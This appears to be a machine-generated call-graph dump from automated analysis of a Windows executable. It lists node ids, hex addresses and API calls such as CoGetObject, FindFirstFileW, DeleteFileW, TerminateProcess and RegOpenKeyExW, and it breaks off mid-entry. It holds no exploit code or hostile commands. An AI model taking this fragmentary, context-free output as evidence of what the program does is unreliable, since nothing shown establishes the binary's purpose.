8c49c6 104309->104311 104310 8c4a15 104313 8c4a19 104310->104313 104316 856d01 8 API calls 104310->104316 104312 85b81d 39 API calls 104311->104312 104314 8c49df 104312->104314 104313->104305 104314->104315 104788 8ca29a 12 API calls 104315->104788 104317 8c4a33 104316->104317 104318 857360 8 API calls 104317->104318 104319 8c4a3f 104318->104319 104789 8579d0 104319->104789 104321 8c4a6c 104322 8579d0 8 API calls 104321->104322 104323 8c4aa3 104322->104323 104324 8579d0 8 API calls 104323->104324 104324->104313 104326 857e30 40 API calls 104325->104326 104327 8c638c 104326->104327 104801 8bd98e 104327->104801 104329 8c6394 104330 8c6398 GetLastError 104329->104330 104331 8c63ad 104329->104331 104330->104331 104331->103984 104333 857e30 40 API calls 104332->104333 104334 857b69 104333->104334 104335 857e30 40 API calls 104334->104335 104336 857b7e 104335->104336 104337 857e30 40 API calls 104336->104337 104338 857b91 104337->104338 104339 857e30 40 API calls 104338->104339 104340 857ba7 104339->104340 104341 8569c4 8 API calls 104340->104341 104342 857bbb 104341->104342 104343 895798 104342->104343 104344 85b81d 39 API calls 104342->104344 104346 856d01 8 API calls 104343->104346 104345 857be2 104344->104345 104345->104343 104376 857c08 try_get_first_available_module 104345->104376 104347 8957b7 104346->104347 104348 857360 8 API calls 104347->104348 104349 8957c9 104348->104349 104352 8579d0 8 API calls 104349->104352 104380 8957ee 104349->104380 104350 856d01 8 API calls 104353 857cbe 104350->104353 104351 857e30 40 API calls 104355 857c97 104351->104355 104352->104380 104356 857ccc 104353->104356 104357 8958a4 104353->104357 104354 857cac 104354->104350 104361 857e30 40 API calls 104355->104361 104362 857ce1 104356->104362 104363 89599f 104356->104363 104359 8958ed 104357->104359 104360 8958ae 104357->104360 104368 857360 8 API calls 104359->104368 104367 857360 8 API calls 104360->104367 104361->104354 104364 857360 8 API calls 104362->104364 104366 857360 8 API calls 104363->104366 104370 857ce9 104364->104370 104365 8578a5 8 API calls 104365->104380 104371 8959ac 104366->104371 104372 8958b6 104367->104372 104369 8958f6 104368->104369 104373 8579d0 8 API calls 104369->104373 104374 85abe7 8 API calls 104370->104374 104377 8579d0 8 API calls 104371->104377 104378 857e30 40 API calls 104372->104378 104379 895912 104373->104379 104402 857d01 try_get_first_available_module 104374->104402 104375 8579d0 8 API calls 104375->104380 104376->104351 104376->104354 104376->104402 104377->104402 104381 8958c8 104378->104381 104385 857e30 40 API calls 104379->104385 104380->104365 104380->104375 104405 857de1 104380->104405 104826 8577ad 8 API calls __fread_nolock 104380->104826 104827 8577ad 8 API calls __fread_nolock 104381->104827 104383 8958dc 104386 8578a5 8 API calls 104383->104386 104388 89592d 104385->104388 104389 8958ea 104386->104389 104387 8578a5 8 API calls 104387->104402 104828 8577ad 8 API calls __fread_nolock 104388->104828 104397 8579d0 8 API calls 104389->104397 104390 8959f2 104391 895a22 104390->104391 104393 895a16 104390->104393 104395 8578a5 8 API calls 104391->104395 104398 859c50 8 API calls 104393->104398 104394 8579d0 8 API calls 104394->104402 104399 895a30 104395->104399 104396 895941 104400 8578a5 8 API calls 104396->104400 104397->104405 104401 895a20 104398->104401 104403 8579d0 8 API calls 104399->104403 104400->104389 104402->104387 104402->104390 104402->104394 104402->104405 104825 8577ad 8 API calls __fread_nolock 104402->104825 104404 895a43 104403->104404 104406 85abe7 8 API calls 104404->104406 104405->103984 104406->104401 104408 8be7e6 104407->104408 104408->103984 104410 856d01 8 API calls 104409->104410 104411 86f7f4 104410->104411 104412 857360 8 API calls 104411->104412 104413 86f802 104412->104413 104414 8579d0 8 API calls 104413->104414 104415 86f838 104414->104415 104416 8579d0 8 API calls 104415->104416 104417 86f873 104416->104417 104418 8579d0 8 API calls 104417->104418 104419 86f8af 104418->104419 104420 8579d0 8 API calls 104419->104420 104421 86f8ea 104420->104421 104422 8579d0 8 API calls 104421->104422 104423 86f926 104422->104423 104424 8579d0 8 API calls 104423->104424 104425 86f965 104424->104425 104426 8579d0 8 API calls 104425->104426 104427 86f9ad 104426->104427 104427->103984 104429 8d86e0 97 API calls 104428->104429 104430 8d9d22 104429->104430 104430->103984 104432 87015b 8 API calls 104431->104432 104433 8cf685 104432->104433 104434 853966 8 API calls 104433->104434 104435 8cf68f 104434->104435 104436 857e30 40 API calls 104435->104436 104437 8cf6a6 GetEnvironmentVariableW 104436->104437 104829 8c1339 8 API calls 104437->104829 104439 8cf6c3 messages 104439->103984 104441 857e30 40 API calls 104440->104441 104442 86ab21 104441->104442 104443 86bb11 8 API calls 104442->104443 104444 86ab38 104443->104444 104445 85b81d 39 API calls 104444->104445 104455 86af54 _wcslen 104444->104455 104445->104455 104446 86ba77 43 API calls 104446->104455 104448 8569c4 8 API calls 104448->104455 104450 859c50 8 API calls 104450->104455 104451 855a63 8 API calls 104451->104455 104452 86b0b4 104452->103984 104453 85b81d 39 API calls 104453->104455 104454 857e30 40 API calls 104454->104455 104455->104446 104455->104448 104455->104450 104455->104451 104455->104452 104455->104453 104455->104454 104456 857467 8 API calls 104455->104456 104457 852f14 Shell_NotifyIconW 104455->104457 104458 853989 49 API calls 104455->104458 104830 874d78 40 API calls 2 library calls 104455->104830 104831 856a09 8 API calls 104455->104831 104456->104455 104457->104455 104458->104455 104460 857e30 40 API calls 104459->104460 104461 8daa8d 104460->104461 104462 8bdac1 46 API calls 104461->104462 104463 8daa9c 104462->104463 104463->103984 104832 855a63 104464->104832 104467 8d441b CoUninitialize 104469 8d4421 104467->104469 104468 8d443a 104471 8d4480 104468->104471 104472 857e30 40 API calls 104468->104472 104469->104468 104470 855a63 8 API calls 104469->104470 104470->104468 104473 857e30 40 API calls 104471->104473 104474 8d4454 104472->104474 104486 8d448f _wcslen 104473->104486 104846 8b0695 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 104474->104846 104476 8d4467 104476->104471 104477 8d446c 104476->104477 104479 8d4f5b 215 API calls 104477->104479 104478 8d465a SetErrorMode CoGetInstanceFromFile 104480 8d469f SetErrorMode 104478->104480 104481 8d46a5 CoGetObject 104478->104481 104490 8d4479 104479->104490 104502 8d4638 104480->104502 104481->104480 104483 8d472e 104481->104483 104485 8d4f5b 215 API calls 104483->104485 104484 8d475a VariantClear 104484->103984 104488 8d4748 SetErrorMode 104485->104488 104486->104478 104494 8d44ea 104486->104494 104487 8d4532 GetRunningObjectTable 104492 8d4555 104487->104492 104493 8d4542 104487->104493 104488->104490 104489 8d46d9 104491 8d46f5 104489->104491 104848 8b0abd 11 API calls _memcmp 104489->104848 104490->104484 104849 8c13c8 60 API calls messages 104491->104849 104495 8d4f5b 215 API calls 104492->104495 104493->104492 104503 8d4577 104493->104503 104494->104487 104498 8d4520 104494->104498 104499 85b81d 39 API calls 104494->104499 104495->104490 104498->104487 104500 8d4511 104499->104500 104500->104498 104501 85b81d 39 API calls 104500->104501 104501->104498 104502->104483 104502->104489 104503->104502 104847 8b0abd 11 API calls _memcmp 104503->104847 104506 8d10cc 104505->104506 104507 8d10ef GetForegroundWindow 104505->104507 104508 8d10d7 IsWindow 104506->104508 104511 8d10e2 104507->104511 104508->104507 104508->104511 104509 85b81d 39 API calls 104510 8d1101 104509->104510 104512 85b81d 39 API calls 104510->104512 104511->104509 104513 8d110e 104512->104513 104850 8cec5d GetWindowRect ClientToScreen 104513->104850 104515 8d1123 GetDC GetPixel 104851 85d530 104515->104851 104517 8d1149 ReleaseDC 104517->103984 104519 85a35b 8 API calls 104518->104519 104520 8cdc82 104519->104520 104853 8c1650 104520->104853 104522 8cdc8a 104522->103984 104524 8d787c 104523->104524 104525 8d7862 104523->104525 104873 8d5e10 104524->104873 104880 8c3d0b 59 API calls __wsopen_s 104525->104880 104529 85f1e0 224 API calls 104530 8d78eb 104529->104530 104531 8d7986 104530->104531 104534 8d792d 104530->104534 104556 8d7874 104530->104556 104532 8d798c 104531->104532 104533 8d79da 104531->104533 104881 8c1802 8 API calls 104532->104881 104535 857e30 40 API calls 104533->104535 104533->104556 104538 8c11b5 8 API calls 104534->104538 104536 8d79ec 104535->104536 104539 85b159 8 API calls 104536->104539 104541 8d7965 104538->104541 104542 8d7a10 CharUpperBuffW 104539->104542 104540 8d79af 104882 85ab97 104540->104882 104545 8619c0 224 API calls 104541->104545 104546 8d7a2a 104542->104546 104544 8d79b7 104549 85c210 224 API calls 104544->104549 104545->104556 104547 8d7a7d 104546->104547 104548 8d7a31 104546->104548 104550 857e30 40 API calls 104547->104550 104552 8c11b5 8 API calls 104548->104552 104549->104556 104551 8d7a85 104550->104551 104886 86a921 9 API calls 104551->104886 104554 8d7a5f 104552->104554 104555 8619c0 224 API calls 104554->104555 104555->104556 104556->103944 104557 8d7a8f 104557->104556 104558 857e30 40 API calls 104557->104558 104559 8d7aaa 104558->104559 104560 85ab97 8 API calls 104559->104560 104561 8d7aba 104560->104561 104562 85c210 224 API calls 104561->104562 104562->104556 104563->103986 104564->103946 104565->103948 104566->103972 104567->103972 104568->103982 104569->103982 104570->103982 104571->103978 104572->103984 104573->103982 104575 8c00bd 104574->104575 104576 8c011d 104575->104576 104577 8c0135 104575->104577 104588 8c00c3 __fread_nolock 104575->104588 104607 8c0313 44 API calls __fread_nolock 104576->104607 104579 8c019b 104577->104579 104580 8c0145 104577->104580 104581 8c01fb 104579->104581 104582 8c01d0 104579->104582 104579->104588 104583 8c017d 104580->104583 104608 8c257f 10 API calls 104580->104608 104581->104588 104612 85b8eb 39 API calls 104581->104612 104582->104588 104611 85b8eb 39 API calls 104582->104611 104598 8c156e 104583->104598 104588->104249 104589 8c0151 104609 8c257f 10 API calls 104589->104609 104591 8c0168 __fread_nolock 104610 8c257f 10 API calls 104591->104610 104594 85b82e 104593->104594 104595 85b835 104593->104595 104594->104595 104613 876621 39 API calls 104594->104613 104595->104250 104597 85b878 104597->104250 104599 8c1579 104598->104599 104600 87012b 8 API calls 104599->104600 104601 8c1580 104600->104601 104602 8c158c 104601->104602 104603 8c15ad 104601->104603 104605 87015b 8 API calls 104602->104605 104604 87015b 8 API calls 104603->104604 104606 8c1595 ___scrt_fastfail 104604->104606 104605->104606 104606->104588 104607->104588 104608->104589 104609->104591 104610->104583 104611->104588 104612->104588 104613->104597 104615 8be1d8 104614->104615 104616 8be1c7 FindFirstFileW 104614->104616 104615->104260 104616->104615 104617 8be1dc FindClose 104616->104617 104617->104615 104619 87015b 8 API calls 104618->104619 104620 86c0c2 104619->104620 104621 87012b 8 API calls 104620->104621 104622 86c0ce 104621->104622 104622->104269 104624 86fb27 104623->104624 104625 86faf0 104623->104625 104632 86fe73 8 API calls 104624->104632 104627 87015b 8 API calls 104625->104627 104628 86faf7 WideCharToMultiByte 104627->104628 104631 86fb30 8 API calls __fread_nolock 104628->104631 104630 86fb1b 104630->104274 104631->104630 104632->104630 104634 857e30 40 API calls 104633->104634 104635 8d8717 104634->104635 104659 8d875c messages 104635->104659 104671 8d945a 104635->104671 104637 8d8a08 104638 8d8bd6 104637->104638 104642 8d8a16 104637->104642 104719 8d966b 47 API calls 104638->104719 104641 8d8be5 104641->104642 104643 8d8bf1 104641->104643 104684 8d860d 104642->104684 104643->104659 104644 857e30 40 API calls 104662 8d87d0 104644->104662 104649 8d8a4f 104697 86ffc0 104649->104697 104652 8d8a6f 104704 8c3d0b 59 API calls __wsopen_s 104652->104704 104653 8d8a89 104705 856d01 104653->104705 104656 8d8a7a GetCurrentProcess TerminateProcess 104656->104653 104659->104288 104662->104637 104662->104644 104662->104659 104702 8b4868 8 API calls __fread_nolock 104662->104702 104703 8d8ca4 41 API calls _strftime 104662->104703 104672 85b159 8 API calls 104671->104672 104673 8d9475 CharLowerBuffW 104672->104673 104721 8b954d 104673->104721 104677 85ae03 8 API calls 104678 8d94b1 104677->104678 104679 857642 8 API calls 104678->104679 104681 8d94c5 104679->104681 104680 8d95e5 _wcslen 104680->104662 104728 858635 8 API calls __fread_nolock 104681->104728 104683 8d94cf _wcslen 104683->104680 104729 8d8ca4 41 API calls _strftime 104683->104729 104685 8d8628 104684->104685 104686 8d8673 104684->104686 104687 87015b 8 API calls 104685->104687 104690 8d981d 104686->104690 104688 8d864a 104687->104688 104688->104686 104689 87012b 8 API calls 104688->104689 104689->104688 104691 8d9a32 messages 104690->104691 104695 8d9841 _strcat _wcslen ___std_exception_copy 104690->104695 104691->104649 104692 85b81d 39 API calls 104692->104695 104693 85b8eb 39 API calls 104693->104695 104694 857e30 40 API calls 104694->104695 104695->104691 104695->104692 104695->104693 104695->104694 104732 8bf5ef 10 API calls _wcslen 104695->104732 104698 86ffd5 104697->104698 104699 87006d Sleep 104698->104699 104700 87005b FindCloseChangeNotification 104698->104700 104701 87003b 104698->104701 104699->104701 104700->104701 104701->104652 104701->104653 104702->104662 104703->104662 104704->104656 104706 856d09 104705->104706 104707 87012b 8 API calls 104706->104707 104708 856d17 104707->104708 104733 857335 104708->104733 104711 857360 104736 85b5f0 104711->104736 104719->104641 104723 8b956d _wcslen 104721->104723 104722 8b965c 104722->104677 104722->104683 104723->104722 104724 8b9661 104723->104724 104725 8b95a2 104723->104725 104724->104722 104731 86e224 41 API calls 104724->104731 104725->104722 104730 86e224 41 API calls 104725->104730 104728->104683 104729->104680 104730->104725 104731->104724 104732->104695 104734 87012b 8 API calls 104733->104734 104735 856d1f 104734->104735 104735->104711 104737 85b5fb 104736->104737 104738 8a020c 104737->104738 104743 85b603 messages 104737->104743 104746 8c15e0 104745->104746 104747 87012b 8 API calls 104746->104747 104748 8c15e7 104747->104748 104751 8bf9df 104748->104751 104750 8c1621 104750->104294 104752 85b159 8 API calls 104751->104752 104753 8bf9f2 CharLowerBuffW 104752->104753 104760 8bfa05 104753->104760 104754 8bfa0f ___scrt_fastfail 104754->104750 104755 8bfa43 104756 8bfa55 104755->104756 104758 8553e8 8 API calls 104755->104758 104759 87015b 8 API calls 104756->104759 104757 8553e8 8 API calls 104757->104760 104758->104756 104761 8bfa83 104759->104761 104760->104754 104760->104755 104760->104757 104762 8bfaa5 104761->104762 104784 8bf917 8 API calls 104761->104784 104769 8bfb36 104762->104769 104765 8bfae2 104765->104754 104766 87012b 8 API calls 104765->104766 104767 8bfafc 104766->104767 104768 87015b 8 API calls 104767->104768 104768->104754 104770 85ae03 8 API calls 104769->104770 104771 8bfb68 104770->104771 104772 85ae03 8 API calls 104771->104772 104773 8bfb71 104772->104773 104774 85ae03 8 API calls 104773->104774 104779 8bfb7a 104774->104779 104775 857467 8 API calls 104775->104779 104776 8766d8 GetStringTypeW 104776->104779 104777 8bfe3e 104777->104765 104779->104775 104779->104776 104779->104777 104780 876621 39 API calls 104779->104780 104781 8bfb36 40 API calls 104779->104781 104782 859c50 8 API calls 104779->104782 104785 876702 GetStringTypeW _strftime 104779->104785 104786 85ad69 8 API calls __fread_nolock 104779->104786 104780->104779 104781->104779 104782->104779 104784->104761 104785->104779 104786->104779 104787->104306 104788->104310 104790 8579e6 104789->104790 104791 895768 104790->104791 104797 8579f0 104790->104797 104800 86b65b 8 API calls 104791->104800 104792 895775 104794 85a35b 8 API calls 104792->104794 104795 895793 104794->104795 104795->104795 104796 857b04 104798 87012b 8 API calls 104796->104798 104797->104792 104797->104796 104799 857b0b 104797->104799 104798->104799 104799->104321 104800->104792 104802 85ae03 8 API calls 104801->104802 104803 8bd9ad 104802->104803 104804 85ae03 8 API calls 104803->104804 104805 8bd9b6 104804->104805 104806 85ae03 8 API calls 104805->104806 104807 8bd9bf 104806->104807 104808 8be7da GetFileAttributesW 104807->104808 104809 8bd9d3 104808->104809 104810 8bd9e5 104809->104810 104811 8559dc 8 API calls 104809->104811 104812 853e34 8 API calls 104810->104812 104811->104810 104813 8bd9f9 FindFirstFileW 104812->104813 104814 8bda18 104813->104814 104815 8bda85 FindClose 104813->104815 104814->104815 104818 8bda1c 104814->104818 104820 8bda90 104815->104820 104816 8bda60 FindNextFileW 104816->104814 104816->104818 104818->104814 104818->104816 104819 856aa4 8 API calls 104818->104819 104821 8559dc 8 API calls 104818->104821 104824 85ad69 8 API calls __fread_nolock 104818->104824 104819->104818 104820->104329 104822 8bda51 DeleteFileW 104821->104822 104822->104816 104823 8bda7c FindClose 104822->104823 104823->104820 104824->104818 104825->104402 104826->104380 104827->104383 104828->104396 104829->104439 104830->104455 104831->104455 104833 8948d1 104832->104833 104836 855a73 104832->104836 104834 857467 8 API calls 104833->104834 104837 8948e2 104833->104837 104834->104837 104835 85abe7 8 API calls 104838 8948ec 104835->104838 104839 87012b 8 API calls 104836->104839 104837->104835 104838->104838 104840 855a86 104839->104840 104841 855aa1 104840->104841 104842 855a8f 104840->104842 104844 85ae03 8 API calls 104841->104844 104843 85a1d4 8 API calls 104842->104843 104845 855a97 CoInitialize 104843->104845 104844->104845 104845->104467 104845->104469 104846->104476 104847->104503 104848->104491 104849->104490 104850->104515 104852 85d53b messages 104851->104852 104852->104517 104854 8c1780 104853->104854 104855 8c1667 104853->104855 104854->104522 104856 8c16b4 104855->104856 104857 8c1687 104855->104857 104860 8c16cb 104855->104860 104858 87015b 8 API calls 104856->104858 104857->104856 104862 8c169b 104857->104862 104866 8c16a9 __fread_nolock 104858->104866 104859 8c16e8 104861 8c170f 104859->104861 104859->104862 104859->104866 104860->104859 104863 87015b 8 API calls 104860->104863 104865 87015b 8 API calls 104861->104865 104864 87015b 8 API calls 104862->104864 104863->104859 104864->104866 104867 8c1715 104865->104867 104868 87012b 8 API calls 104866->104868 104872 86c130 8 API calls 104867->104872 104868->104854 104870 8c1721 104871 86fac6 10 API calls 104870->104871 104871->104866 104872->104870 104874 8d5e2b 104873->104874 104879 8d5e79 104873->104879 104875 87015b 8 API calls 104874->104875 104876 8d5e4d 104875->104876 104877 87012b 8 API calls 104876->104877 104876->104879 104887 8c112a 8 API calls 104876->104887 104877->104876 104879->104529 104880->104556 104881->104540 104883 85aba7 104882->104883 104884 87012b 8 API calls 104883->104884 104885 85abba 104884->104885 104885->104544 104886->104557 104887->104876 104888->104046 104889->104034 104890->104070 104891->104009 104892->104035 104893->104058 104894->104058 104895->104058 104896->104019 104897->104029 104898->104028 104899->104028 104901 85b249 104900->104901 104907 85b271 messages 104900->104907 104902 85b257 104901->104902 104903 85b23b 8 API calls 104901->104903 104904 85b25d 104902->104904 104905 85b23b 8 API calls 104902->104905 104903->104902 104904->104907 104916 85b670 8 API calls messages 104904->104916 104905->104904 104907->104038 104908->104045 104909->104045 104910->104045 104911->104055 104912->104058 104913->104045 104914->104063 104915->104058 104916->104907 104918 8be543 104917->104918 104920 8be55a 104918->104920 104922 876702 GetStringTypeW _strftime 104918->104922 104920->104087 104921->104087 104922->104918 104923 85fd5f 104924 85fd73 104923->104924 104930 8602c5 104923->104930 104925 85fd85 104924->104925 104927 87012b 8 API calls 104924->104927 104926 85a35b 8 API calls 104925->104926 104928 8a45b3 104925->104928 104929 85fdde 104925->104929 104926->104925 104927->104925 104963 8c183e 8 API calls 104928->104963 104931 8619c0 225 API calls 104929->104931 104939 85f33d messages 104929->104939 104930->104925 104962 85ad69 8 API calls __fread_nolock 104930->104962 104937 85f216 messages 104931->104937 104934 8a52b2 104969 8c3d0b 59 API calls __wsopen_s 104934->104969 104936 860535 104936->104939 104965 85ad69 8 API calls __fread_nolock 104936->104965 104937->104934 104937->104936 104937->104939 104940 8a4c62 104937->104940 104941 8a51e1 104937->104941 104942 85ad69 8 API calls 104937->104942 104946 870592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104937->104946 104950 85ae03 8 API calls 104937->104950 104952 8a509c 104937->104952 104953 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104937->104953 104955 87012b 8 API calls 104937->104955 104956 85f94e messages 104937->104956 104957 8703f3 29 API calls pre_c_initialization 104937->104957 104958 860830 225 API calls 2 library calls 104937->104958 104959 860cf0 40 API calls messages 104937->104959 104960 8d7db9 41 API calls __wsopen_s 104937->104960 104961 8d7ef8 54 API calls 104937->104961 104940->104939 104964 85ad69 8 API calls __fread_nolock 104940->104964 104968 8c3d0b 59 API calls __wsopen_s 104941->104968 104942->104937 104946->104937 104950->104937 104966 8c3d0b 59 API calls __wsopen_s 104952->104966 104953->104937 104955->104937 104967 8c3d0b 59 API calls __wsopen_s 104956->104967 104957->104937 104958->104937 104959->104937 104960->104937 104961->104937 104962->104925 104963->104939 104964->104939 104965->104939 104966->104956 104967->104939 104968->104939 104969->104939 104970 888752 104975 88850e 104970->104975 104973 88877a 104980 88853f try_get_first_available_module 104975->104980 104977 88873e 104994 882aac 26 API calls _strftime 104977->104994 104979 888693 104979->104973 104987 890cd7 104979->104987 104983 888688 104980->104983 104990 87915b 40 API calls 2 library calls 104980->104990 104982 8886dc 104982->104983 104991 87915b 40 API calls 2 library calls 104982->104991 104983->104979 104993 882b68 20 API calls _abort 104983->104993 104985 8886fb 104985->104983 104992 87915b 40 API calls 2 library calls 104985->104992 104995 8903d4 104987->104995 104989 890cf2 104989->104973 104990->104982 104991->104985 104992->104983 104993->104977 104994->104979 104996 8903e0 __FrameHandler3::FrameUnwindToState 104995->104996 104997 8903ee 104996->104997 105000 890427 104996->105000 105053 882b68 20 API calls _abort 104997->105053 104999 8903f3 105054 882aac 26 API calls _strftime 104999->105054 105006 8909ae 105000->105006 105005 8903fd __wsopen_s 105005->104989 105056 890782 105006->105056 105009 8909f9 105074 885571 105009->105074 105010 8909e0 105088 882b55 20 API calls _abort 105010->105088 105013 8909fe 105014 890a1e 105013->105014 105015 890a07 105013->105015 105087 8906ed CreateFileW 105014->105087 105090 882b55 20 API calls _abort 105015->105090 105019 890a0c 105091 882b68 20 API calls _abort 105019->105091 105020 890ad4 GetFileType 105024 890adf GetLastError 105020->105024 105025 890b26 105020->105025 105022 890aa9 GetLastError 105093 882b32 20 API calls __dosmaperr 105022->105093 105023 890a57 105023->105020 105023->105022 105092 8906ed CreateFileW 105023->105092 105094 882b32 20 API calls __dosmaperr 105024->105094 105096 8854ba 21 API calls 2 library calls 105025->105096 105026 8909e5 105089 882b68 20 API calls _abort 105026->105089 105030 890aed CloseHandle 105030->105026 105033 890b16 105030->105033 105032 890a9c 105032->105020 105032->105022 105095 882b68 20 API calls _abort 105033->105095 105034 890b47 105036 890b93 105034->105036 105097 8908fe 72 API calls 3 library calls 105034->105097 105041 890bc0 105036->105041 105098 8904a0 72 API calls 4 library calls 105036->105098 105037 890b1b 105037->105026 105040 890bb9 105040->105041 105042 890bd1 105040->105042 105043 8889fe __wsopen_s 29 API calls 105041->105043 105044 89044b 105042->105044 105045 890c4f CloseHandle 105042->105045 105043->105044 105055 890474 LeaveCriticalSection __wsopen_s 105044->105055 105099 8906ed CreateFileW 105045->105099 105047 890c7a 105048 890c84 GetLastError 105047->105048 105049 890cb0 105047->105049 105100 882b32 20 API calls __dosmaperr 105048->105100 105049->105044 105051 890c90 105101 885683 21 API calls 2 library calls 105051->105101 105053->104999 105054->105005 105055->105005 105057 8907bd 105056->105057 105058 8907a3 105056->105058 105102 890712 105057->105102 105058->105057 105109 882b68 20 API calls _abort 105058->105109 105060 8907f5 105064 890824 105060->105064 105111 882b68 20 API calls _abort 105060->105111 105062 8907b2 105110 882aac 26 API calls _strftime 105062->105110 105071 890877 105064->105071 105113 87da5d 26 API calls 2 library calls 105064->105113 105067 890872 105069 8908f1 105067->105069 105067->105071 105068 890819 105112 882aac 26 API calls _strftime 105068->105112 105114 882abc 11 API calls _abort 105069->105114 105071->105009 105071->105010 105073 8908fd 105075 88557d __FrameHandler3::FrameUnwindToState 105074->105075 105117 8832ae EnterCriticalSection 105075->105117 105078 8855a9 105081 885350 __wsopen_s 21 API calls 105078->105081 105079 885584 105079->105078 105083 885617 EnterCriticalSection 105079->105083 105086 8855cb 105079->105086 105080 8855f4 __wsopen_s 105080->105013 105082 8855ae 105081->105082 105082->105086 105121 885497 EnterCriticalSection 105082->105121 105085 885624 LeaveCriticalSection 105083->105085 105083->105086 105085->105079 105118 88567a 105086->105118 105087->105023 105088->105026 105089->105044 105090->105019 105091->105026 105092->105032 105093->105026 105094->105030 105095->105037 105096->105034 105097->105036 105098->105040 105099->105047 105100->105051 105101->105049 105104 89072a 105102->105104 105103 890745 105103->105060 105104->105103 105115 882b68 20 API calls _abort 105104->105115 105106 890769 105116 882aac 26 API calls _strftime 105106->105116 105108 890774 105108->105060 105109->105062 105110->105057 105111->105068 105112->105064 105113->105067 105114->105073 105115->105106 105116->105108 105117->105079 105122 8832f6 LeaveCriticalSection 105118->105122 105120 885681 105120->105080 105121->105086 105122->105120 105123 8a2f96 105137 85dd50 messages 105123->105137 105124 85e0b1 PeekMessageW 105124->105137 105125 85dda7 GetInputState 105125->105124 105125->105137 105126 86f3b7 2 API calls 105126->105137 105127 8a2254 TranslateAcceleratorW 105127->105137 105128 85e113 TranslateMessage DispatchMessageW 105129 85e12f PeekMessageW 105128->105129 105129->105137 105130 85dfa4 timeGetTime 105130->105137 105131 85e14f Sleep 105153 85e160 105131->105153 105132 8a310a Sleep 105132->105153 105133 86ef0e timeGetTime 105133->105153 105134 8a2370 timeGetTime 105155 86a921 9 API calls 105134->105155 105136 8bdac1 46 API calls 105136->105153 105137->105124 105137->105125 105137->105126 105137->105127 105137->105128 105137->105129 105137->105130 105137->105131 105137->105132 105137->105134 105142 85df75 105137->105142 105147 85e2f0 225 API calls 105137->105147 105148 85e570 225 API calls 105137->105148 105150 85f1e0 225 API calls 105137->105150 105151 8619c0 225 API calls 105137->105151 105152 85c210 225 API calls 105137->105152 105156 8c4199 8 API calls 105137->105156 105157 8c3d0b 59 API calls __wsopen_s 105137->105157 105138 8a31a1 GetExitCodeProcess 105139 8a31cd CloseHandle 105138->105139 105140 8a31b7 WaitForSingleObject 105138->105140 105139->105153 105140->105137 105140->105139 105141 8a2fc7 105141->105142 105143 8e317d GetForegroundWindow 105143->105153 105145 8a323f Sleep 105145->105137 105147->105137 105148->105137 105150->105137 105151->105137 105152->105137 105153->105133 105153->105136 105153->105137 105153->105138 105153->105141 105153->105142 105153->105143 105153->105145 105158 8d5ddf 8 API calls 105153->105158 105159 8befbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105153->105159 105155->105137 105156->105137 105157->105137 105158->105153 105159->105153 105160 851098 105165 854e68 105160->105165 105164 8510a7 105166 85ae03 8 API calls 105165->105166 105167 854e7f GetVersionExW 105166->105167 105168 857467 8 API calls 105167->105168 105169 854ecc 105168->105169 105173 854f02 105169->105173 105186 858635 8 API calls __fread_nolock 105169->105186 105171 854ef6 105187 85699d 8 API calls 105171->105187 105174 854fa6 GetCurrentProcess IsWow64Process 105173->105174 105178 894259 105173->105178 105175 854fc2 105174->105175 105176 89429e GetSystemInfo 105175->105176 105177 854fda LoadLibraryA 105175->105177 105179 855027 GetSystemInfo 105177->105179 105180 854feb GetProcAddress 105177->105180 105182 855001 105179->105182 105180->105179 105181 854ffb GetNativeSystemInfo 105180->105181 105181->105182 105183 855005 FreeLibrary 105182->105183 105184 85109d 105182->105184 105183->105184 105185 8703f3 29 API calls __onexit 105184->105185 105185->105164 105186->105171 105187->105173 105188 8a45d7 105199 86e28e 105188->105199 105190 8a45ed 105198 8a4668 105190->105198 105208 86a921 9 API calls 105190->105208 105192 85c210 225 API calls 105193 8a46b4 105192->105193 105196 8a515e 105193->105196 105210 8c3d0b 59 API calls __wsopen_s 105193->105210 105195 8a4648 105195->105193 105209 8c21a8 8 API calls 105195->105209 105198->105192 105200 86e2af 105199->105200 105201 86e29c 105199->105201 105203 86e2b4 105200->105203 105204 86e2e2 105200->105204 105202 85a35b 8 API calls 105201->105202 105207 86e2a6 105202->105207 105205 87012b 8 API calls 105203->105205 105206 85a35b 8 API calls 105204->105206 105205->105207 105206->105207 105207->105190 105208->105195 105209->105198 105210->105196 105211 8a3fd7 105215 8c17a9 105211->105215 105213 8a3fe2 105214 8c17a9 40 API calls 105213->105214 105214->105213 105216 8c17b6 105215->105216 105222 8c17e3 105215->105222 105217 8c17e5 105216->105217 105219 8c17ea 105216->105219 105216->105222 105224 8c17dd 105216->105224 105227 86fd37 40 API calls 105217->105227 105220 857e30 40 API calls 105219->105220 105221 8c17f1 105220->105221 105223 856aa4 8 API calls 105221->105223 105222->105213 105223->105222 105226 85b3b0 39 API calls 105224->105226 105226->105222 105227->105219 105228 85105b 105233 853ae4 105228->105233 105230 85106a 105264 8703f3 29 API calls __onexit 105230->105264 105232 851074 105234 853af4 __wsopen_s 105233->105234 105235 85ae03 8 API calls 105234->105235 105236 853baa 105235->105236 105237 853dd1 9 API calls 105236->105237 105238 853bb3 105237->105238 105265 853a75 105238->105265 105241 8559dc 8 API calls 105242 853bcc 105241->105242 105243 8558dc 8 API calls 105242->105243 105244 853bdb 105243->105244 105245 85ae03 8 API calls 105244->105245 105246 853be4 105245->105246 105247 85abe7 8 API calls 105246->105247 105248 853bed RegOpenKeyExW 105247->105248 105249 8939cf RegQueryValueExW 105248->105249 105254 853c0f 105248->105254 105250 8939ec 105249->105250 105251 893a65 RegCloseKey 105249->105251 105252 87015b 8 API calls 105250->105252 105251->105254 105260 893a77 _wcslen 105251->105260 105253 893a05 105252->105253 105255 853966 8 API calls 105253->105255 105254->105230 105256 893a10 RegQueryValueExW 105255->105256 105257 893a2d 105256->105257 105259 893a47 messages 105256->105259 105258 857467 8 API calls 105257->105258 105258->105259 105259->105251 105260->105254 105261 85a1d4 8 API calls 105260->105261 105262 8558dc 8 API calls 105260->105262 105263 8553e8 8 API calls 105260->105263 105261->105260 105262->105260 105263->105260 105264->105232 105266 8922a0 __wsopen_s 105265->105266 105267 853a82 GetFullPathNameW 105266->105267 105268 853aa4 105267->105268 105269 857467 8 API calls 105268->105269 105270 853ac2 105269->105270 105270->105241 105271 860766 105272 87012b 8 API 